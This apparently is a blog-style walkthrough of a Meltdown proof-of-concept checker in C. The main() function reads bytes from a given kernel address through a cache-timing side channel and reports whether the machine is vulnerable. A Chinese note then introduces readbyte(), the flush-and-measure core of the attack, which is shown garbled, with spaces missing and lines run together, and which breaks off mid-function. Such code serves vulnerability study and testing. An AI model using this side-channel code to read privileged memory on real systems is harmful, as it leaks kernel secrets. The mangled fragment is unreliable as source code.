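/*
 * Entry point of the checker.
 *
 * Usage: argv[1] is the start address (hex) and argv[2] is the number of
 * bytes to examine (hex). For each byte, readbyte() is called and its result
 * is compared with the corresponding byte of the expected "%s version %s"
 * string; the verdict is printed on stderr.
 *
 * Process exit status:
 *    1  more than half of the compared bytes matched ("VULNERABLE")
 *    0  otherwise ("NOT VULNERABLE")
 *   -1  /proc/version could not be opened (a shell reports this as 255)
 *   the value returned by usage() when arguments are missing or unparsable
 *
 * Wrapper scripts should therefore treat only an exit status of exactly 1 as
 * "vulnerable"; any other non-zero status is an error, not a finding.
 *
 * The verdict is a heuristic based on a byte-match score. A "NOT VULNERABLE"
 * result also occurs when the supplied address does not hold the expected
 * string or when the measurements are too noisy, so by itself it does not
 * prove that a mitigation is active.
 */
int main(int argc, char *argv[])
{
    int ret, fd, score, is_vulnerable;
    /*
     * The loop counter has the same unsigned type as `size`, so the loop
     * bound is compared without a signed/unsigned conversion and the counter
     * cannot overflow (undefined for a signed int) before it reaches `size`.
     */
    unsigned long addr, size, i;
    static char expected[] = "%s version %s";

    progname = argv[0];

    if (argc < 3)
        return usage();

    /* Both arguments are parsed as hexadecimal unsigned long values. */
    if (sscanf(argv[1], "%lx", &addr) != 1)
        return usage();
    if (sscanf(argv[2], "%lx", &size) != 1)
        return usage();

    /* Fill every byte of target_array with the value 1. */
    memset(target_array, 1, sizeof(target_array));

    /* NOTE(review): the result of set_signal() is stored but never checked;
     * confirm what it returns on failure and bail out in that case. */
    ret = set_signal();
    pin_cpu0();

    /* Set the cache-hit threshold used by the measurement code. */
    set_cache_hit_threshold();

    /* /proc/version is a procfs file (not a system call); readbyte() reads
     * it through this descriptor with pread() on every cycle. */
    fd = open("/proc/version", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }

    score = 0;
    for (i = 0; i < size; i++) {
        /* presumably readbyte() yields a byte value 0..255, or -1 when no
         * value could be determined - TODO confirm; hist[] is indexed with
         * it below, so anything outside that range would be out of bounds. */
        ret = readbyte(fd, addr);
        if (ret == -1)
            ret = 0xff;

        /* %lx / %x print in hexadecimal; non-printable bytes are shown as a
         * blank, and 0xff reports a hit count of 0. */
        printf("read %lx = %x %c (score=%d/%d)\n",
               addr, ret, isprint(ret) ? ret : ' ',
               ret != 0xff ? hist[ret] : 0,
               CYCLES);

        /* Only positions covered by `expected` (including its terminating
         * NUL) can contribute to the score. */
        if (i < sizeof(expected) && ret == expected[i])
            score++;

        addr++;
    }

    close(fd);

    /* Vulnerable when more than half of the comparable bytes matched. */
    is_vulnerable = score > min(size, sizeof(expected)) / 2;

    if (is_vulnerable)
        fprintf(stderr, "VULNERABLE\n");
    else
        fprintf(stderr, "NOT VULNERABLE\n");

    exit(is_vulnerable);
}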
开始看看重要函数
在这里插入代码片intreadbyte(int fd,unsignedlong addr){
int i, ret =0, max =-1, maxi =-1;staticchar buf[256];memset(hist,0,sizeof(hist));//将hist参数全部设为0for(i =0; i < CYCLES; i++){
ret =pread(fd, buf,sizeof(buf),0);//,将fd读入到buf array中,成功ret=返回的字节数。if(ret <0){
perror("pread");break;}clflush_target();//Flush阶段,就是将target array在cache清空_mm_mfence